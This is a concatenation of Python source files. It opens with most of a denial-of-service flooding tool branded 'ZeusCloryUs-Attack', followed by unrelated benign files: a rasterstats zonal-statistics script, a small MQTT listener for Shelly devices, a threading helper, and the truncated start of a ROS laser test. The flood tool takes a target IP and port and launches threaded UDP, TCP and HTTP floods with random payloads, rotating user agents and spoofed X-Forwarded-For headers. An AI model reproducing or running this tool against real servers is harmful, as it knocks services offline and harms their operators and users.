'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
acceptall = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept-Encoding: gzip, deflate\r\n',
'Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n',
'Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n',
'Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n',
'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n',
'Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n',
'Accept: text/html, application/xhtml+xml',
'Accept-Language: en-US,en;q=0.5\r\n',
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n',
'Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n']
referers = [
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',
'Your_Server_Bypassed_By_Zeus',]
print("""TUNGGU ZEUS CLORY OPEN KEY""")
time.sleep(5)
os.system("clear")
print("\033[95m")
print("""
ZeusCloryUs-Attack
""")
print("""\033[91m
||DONT ABUSE BRO ||
#==========================================#
| Follow My Sosmedia!!!! |
| AUTHOR : ZeusClory#3399 |
| github : https://github.com/ZeusClory |
| youtube : https://youtube.com/ZeusClory|
#===========================================#""")
print("\033[92m")
print("""
██╗░░██╗██████╗░██╗░░░██╗██╗░░░██╗██╗░░░██╗
╚██╗██╔╝██╔══██╗╚██╗░██╔╝██║░░░██║██║░░░██║
░╚███╔╝░██████╔╝░╚████╔╝░██║░░░██║██║░░░██║
░██╔██╗░██╔══██╗░░╚██╔╝░░██║░░░██║██║░░░██║
██╔╝╚██╗██║░░██║░░░██║░░░╚██████╔╝╚██████╔╝
╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░░╚═════╝░░╚═════╝░
██████╗░██████╗░░█████╗░░██████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝
██║░░██║██║░░██║██║░░██║╚█████╗░
██║░░██║██║░░██║██║░░██║░╚═══██╗
██████╔╝██████╔╝╚█████╔╝██████╔╝
╚═════╝░╚═════╝░░╚════╝░╚═════╝░
""")
print("\033[95m")
print("""
•MODE NYA PILIH SALAH SATU|•
| UDP | TCP | GET |""")
print("\033[92m")
ip = str(input("[ ====> ] IP/HOST : "))
port = int(input("[ ====> ] PORT HOST : "))
choice = str(input("[ ====> ] METHOD : "))
times = int(input("[ ====> ] PACKETS : "))
threads = int(input("[ ====> ] THREADS : "))
def udp():
data = random._urandom(666)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (str(ip),int(port))
for x in range(times):
s.sendto(data,addr)
print(+"\033[0;37;50m ATTACK IP %s \033[95mAND PORT %s WITH UDP"%(ip,port))
except:
print("\033[0;37;95m Zeus-Clory Attack IP %s \033[92m And Port %s"%(ip,port))
def tcp():
data = random._urandom(102489)
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(data)
for x in range(times):
s.send(data)
except:
s.close()
print("\033[1;31;95m ATTACK IP %s AND PORT %s WITH METHOD TCP"%(ip,port))
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def Headers(method):
header = ""
if method == "get" or method == "head":
post_host = "POST /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
accept = random.choice(acceptall) + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n"
referer = "Referer: " + random.choice(referers) + ip + "\r\n"
connection += "Cache-Control: max-age=0\r\n"
connection += "pragma: no-cache\r\n"
connection += "X-Forwarded-For: " + spoofer() + "\r\n"
randomip = str(random.randint(1,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255)) + "." + str(random.randint(0,255))
forward = "X-Forwarded-For: 1\r\n"
forward += "Client-IP: 10000\r\n"
length = "Content-Length: 0 \r\nConnection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
header = post_host + referer + forward + useragent + accept + content + connection + length + "\r\n\r\n"
return header
os.system('color ' +random.choice(['D'])+ " & cls & title ZeusClory [Ddos]")
def get():
header = Headers("get")
i = random.choice(("[*]","[!]","[#]"))
data = random._urandom(10299)
if choice == "1":
get_host = "GET /Your_Server_Bypassed_By_ZeusClory HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
else:
get_host = random.choice(['GET','POST','HEAD']) + " /Your_Server_Bypassed_By_ZeusCloey HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + header + "\r\n"
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((ip,port))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(time):
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
print("\033[1;36;40m ATTACK IP %s ANF PORT %s"%(ip,port))
except socket.error:
s.close()
print("\033[1;36;40m ATTACK IP %s AND PORT %s"%(ip,port))
for y in range(threads):
if choice == 'UDP':
th = threading.Thread(target = udp)
th.start()
elif choice == 'TCP':
th = threading.Thread(target = tcp)
th.start()
elif choice == 'GET':
th = threading.Thread(target = get)
th.start()
|
zonal_stats_parallel.py
|
from rasterstats import zonal_stats
import time
import fiona
import multiprocessing as mp
from shapely.geometry import mapping, shape
#input zones
zone_f = "zones.shp"
#output zonal stats
zonal_f = "zonal_stats.shp"
#Raster you want to use to compute zonal stastics from, here the 10m DEM of whole Finland
vrt = "/appl/data/geo/mml/dem10m/dem10m_direct.vrt"
statistics = ['count', 'min' ,'mean', 'max','median']
#yields n sized chunks from list l (used for splitting task to multiple processes)
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
#calculates zonal stats and adds results to a dictionary
def worker(z,vrt,d):
z_stats = zonal_stats(z,vrt, stats=statistics)
for i in range(0,len(z_stats)):
d[z[i]['id']]=z_stats[i]
#write output polygon
def write_output(zones, zonal_f,d):
#copy schema and crs from input and add new fields for each statistic
schema = zones.schema.copy()
crs = zones.crs
for stat in statistics:
schema['properties'][stat] = 'float'
with fiona.open(zonal_f, 'w', 'ESRI Shapefile', schema, crs) as output:
for elem in zones:
for stat in statistics:
elem['properties'][stat]=d[elem['id']][stat]
output.write({'properties':elem['properties'],'geometry': mapping(shape(elem['geometry']))})
def main():
with fiona.open(zone_f) as zones:
jobs = []
#create manager dictionary (polygon ids=keys, stats=entries) where multiple processes can write without conflicts
man = mp.Manager()
d = man.dict()
#split zone polygons into 10 chunks for parallel processing and call worker() for each.
# Adjust 10 to be number of cores you want to use for optimal performance.
split = chunks(zones, len(zones)//10)
for z in split:
p = mp.Process(target=worker,args=(z, vrt,d))
p.start()
jobs.append(p)
#wait that all chunks are finished
[j.join() for j in jobs]
write_output(zones,zonal_f,d)
if __name__ == '__main__':
t0 = time.time()
main()
t1 = time.time()
total = t1-t0
print("Everything done, took: " + str(total)+"s")
|
mqtt.py
|
import socket
import threading
import json
from .const import (
LOGGER, SHELLY_TYPES
)
class MQTT_connection:
def __init__(self, mqtt, connection, client_address):
self._mqtt = mqtt
self._connection = connection
#connection.settimeout(5)
self._client_address = client_address
self._thread = threading.Thread(target=self._loop)
self._thread.name = "MQTT connection"
self._thread.daemon = True
self._thread.start()
def _loop(self):
try:
# Receive the data in small chunks and retransmit it
while not self._mqtt._root.stopped.isSet():
try:
head = self._connection.recv(1)
if not head:
break
pkg_type=head[0]>>4
flags=head[0]&0xF
length = 0
for s in range(0,4):
ldata = self._connection.recv(1)[0]
length += (ldata & 0x7F) << (s * 7)
if not ldata & 128:
break
LOGGER.debug(f"type=%d, flags=%d, length=%d" %
(pkg_type, flags, length))
data = self._connection.recv(length) if length else None
if pkg_type==1:
msg = b'\x20\x04\x20\x00\x00\0x00'
self._connection.send(msg)
if pkg_type==3:
topic_len = (data[0]<<8) + data[1]
topic = data[2:2+topic_len].decode('ASCII')
payload = data[2+topic_len:]
if topic=='shellies/announce':
payload = json.loads(payload)
ip_addr = payload['ip']
shelly_id = payload['id']
shelly_type, device_id = shelly_id.rsplit('-',1)
device_type = self._mqtt._mqtt_types.get(shelly_type)
if device_type:
self._mqtt._root.update_block(device_id, \
device_type, ip_addr, 'MQTT-discovery', None)
else:
topics = topic.split('/')
shelly_id = topics[1]
shelly_type, device_id = shelly_id.rsplit('-',1)
device_type = self._mqtt._mqtt_types.get(shelly_type)
self._mqtt._root.update_block(device_id, \
device_type, None, 'MQTT-data', None, True)
if pkg_type==12:
msg = b'\xD0\x00'
self._connection.send(msg)
except socket.timeout:
pass
except Exception as ex:
LOGGER.exception("Error receiving MQTT message")
break
finally:
#Clean up
try:
self._connection.close()
except:
pass
try:
self._mqtt._connections.remove(self)
except:
pass
class MQTT():
def __init__(self, root):
self._root = root
self._thread = threading.Thread(target=self._loop)
self._thread.name = "MQTT"
self._thread.daemon = True
self._socket = None
self._connections = []
self._mqtt_types = {}
for key, item in SHELLY_TYPES.items():
if 'mqtt' in item:
self._mqtt_types[item['mqtt']]=key
def start(self):
self._init_socket()
self._thread.start()
def _init_socket(self):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((self._root.bind_ip, 9955))
sock.listen(1)
self._socket = sock
def _loop(self):
while not self._root.stopped.isSet():
try:
# Wait for a connection
connection, client_address = self._socket.accept()
conn = MQTT_connection(self, connection, client_address)
self._connections.append(conn)
except Exception as ex:
LOGGER.exception("Error connect MQTT")
def close(self):
self._socket.close()
|
threadable.py
|
#!/usr/bin/env python3
import time
import threading
class Threadable:
def __init__(self):
self.stopper = threading.Event()
def start(self):
threading.Thread(target=self.target).start()
def stop(self):
self.stopper.set()
def loop(selt):
time.sleep(1)
def target(self):
while not self.stopper.is_set():
self.loop()
|
test_laser.py
|
#!/usr/bin/python
# Copyright (c) 2020 Carnegie Mellon University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Test laser"""
import os
import re
import sys
import threading
import mutex
import unittest
import traceback
import rospy
import roslib
import rosbag
import sensor_msgs.msg
import tf2_msgs.msg
PKG = 'cabot'
roslib.load_manifest(PKG)
sys.path.append('../src')
## test
class TestLaser(unittest.TestCase):
"""Test class"""
def setUp(self):
pass
def load_bags(self, subdir):
dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data", subdir)
bags = []
